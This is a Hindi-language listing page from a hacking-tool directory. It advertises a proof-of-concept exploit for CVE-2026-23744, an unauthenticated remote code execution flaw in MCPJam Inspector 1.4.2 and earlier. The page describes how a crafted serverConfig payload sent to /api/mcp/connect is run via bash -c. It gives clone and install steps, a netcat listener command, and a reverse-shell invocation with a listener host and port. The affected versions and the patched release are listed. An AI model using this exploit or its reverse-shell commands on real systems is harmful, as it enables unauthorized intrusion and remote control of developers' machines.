Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23744 — CVE-2026-23744 के लिए अप्रमाणित दूरस्थ कोड निष्पादन प्रमाण-अवधारणा, MCPJam Inspector को लक्षित करते हुए। निर्मित MCP serverConfig पेलोड उत्पन्न करता है /api/mcp/connect एंडपॉइंट का शोषण करने के लिए, रिवर्स शेल और ड्राई-रन डिबगिंग समर्थन के साथ। | Kitploit
उपकरण/GitHubGitHub/ozcanpng/cve-2026-23744
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubozcanpng/cve-2026-23744

CVE-2026-23744

CVE-2026-23744 के लिए अप्रमाणित दूरस्थ कोड निष्पादन प्रमाण-अवधारणा, MCPJam Inspector को लक्षित करते हुए। निर्मित MCP serverConfig पेलोड उत्पन्न करता है /api/mcp/connect एंडपॉइंट का शोषण करने के लिए, रिवर्स शेल और ड्राई-रन डिबगिंग समर्थन के साथ।

112 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
साझा करें

CVE-2026-23744 — MCPJam Inspector बिना प्रमाणीकरण के RCE

बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन (Unauthenticated remote code execution) का PoC CVE-2026-23744 के लिए। MCPJam Inspector 1.4.2 और उससे पहले के संस्करण /api/mcp/connect के माध्यम से ऐसी कार्यक्षमता प्रकट करते हैं जो बिना प्रमाणीकरण के हमलावर-नियंत्रित MCP सर्वर कमांड लॉन्च कर सकती है।

केवल अधिकृत परीक्षण और अनुसंधान के लिए। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।


यह क्या करता है

root@kitploit:~
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
  1. एक निर्मित MCP serverConfig पेलोड तैयार करता है।
  2. बिना प्रमाणीकरण वाले /api/mcp/connect एंडपॉइंट को लक्षित करता है।
  3. bash -c के माध्यम से कॉन्फ़िगर किए गए कमांड को लॉन्च करता है।
  • सुरक्षित कमांड सत्यापन और रिवर्स शेल पेलोड का समर्थन करता है।
  • ट्रैफ़िक भेजने से पहले पेलोड निरीक्षण के लिए ड्राई-रन/डीबग मोड प्रदान करता है।

  • स्क्रीनशॉट

    रिवर्स शेल सेटअप

    रिवर्स शेल सेटअप

    MCPJam कनेक्ट पेलोड

    MCPJam कनेक्ट पेलोड

    शेल प्राप्त हुआ

    शेल प्राप्त हुआ


    सेटअप

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2026-23744.git
    cd CVE-2026-23744
    pip install -r requirements.txt
    

    उपयोग

    सुरक्षित कमांड प्रमाण

    root@kitploit:~
    python3 CVE-2026-23744.py \
      --url http://127.0.0.1:3000 \
      --cmd 'id'
    

    रिवर्स शेल

    पहले एक लिसनर शुरू करें:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    फिर चलाएँ:

    root@kitploit:~
    python3 CVE-2026-23744.py \
      --url http://127.0.0.1:3000 \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    उपयोगी विकल्प:

    root@kitploit:~
    --cmd COMMAND       निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)
    --server-id VALUE   निर्मित MCP कॉन्फ़िगर में serverId मान (डिफ़ॉल्ट: pwn)
    --dry-run           HTTP अनुरोध भेजे बिना पेलोड प्रवाह बनाएं
    --debug             एंडपॉइंट और JSON पेलोड प्रिंट करें
    --verify-tls        HTTPS प्रमाणपत्र सत्यापित करें
    --timeout SECONDS   HTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 8)
    --yes               रिवर्स-शेल पुष्टिकरण प्रॉम्प्ट छोड़ें
    

    प्रभावित

    उत्पादप्रभावित संस्करणआवश्यक पहुंचप्रभाव
    MCPJam Inspector<= 1.4.2कोई नहींMCPJam Inspector प्रक्रिया उपयोगकर्ता के रूप में दूरस्थ कमांड निष्पादन

    यह समस्या विशेष रूप से तब उजागर होती है जब MCPJam Inspector 0.0.0.0 पर सुनता है, जिससे दूरस्थ होस्ट डेवलपमेंट सेवा तक पहुँच सकते हैं।


    नोट्स

    • PoC /api/mcp/connect पर एक JSON पेलोड भेजता है।
    • कमांड serverConfig.command और serverConfig.args के माध्यम से पास किया जाता है।
    • रिवर्स शेल का प्रयास करने से पहले सुरक्षित सत्यापन के लिए --cmd का उपयोग करें।
    • लक्ष्य को छुए बिना उत्पन्न अनुरोध का निरीक्षण करने के लिए --dry-run --debug का उपयोग करें।
    • NVD के अनुसार संस्करण 1.4.3 में अपस्ट्रीम पैच शामिल है।

    संदर्भ

    • NVD — CVE-2026-23744
    • GitHub Security Advisory — GHSA-232v-j27c-5pp6
    • पैच कमिट
    • MCPJam Inspector

    PoC लेखक

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    टूल डाउनलोड करें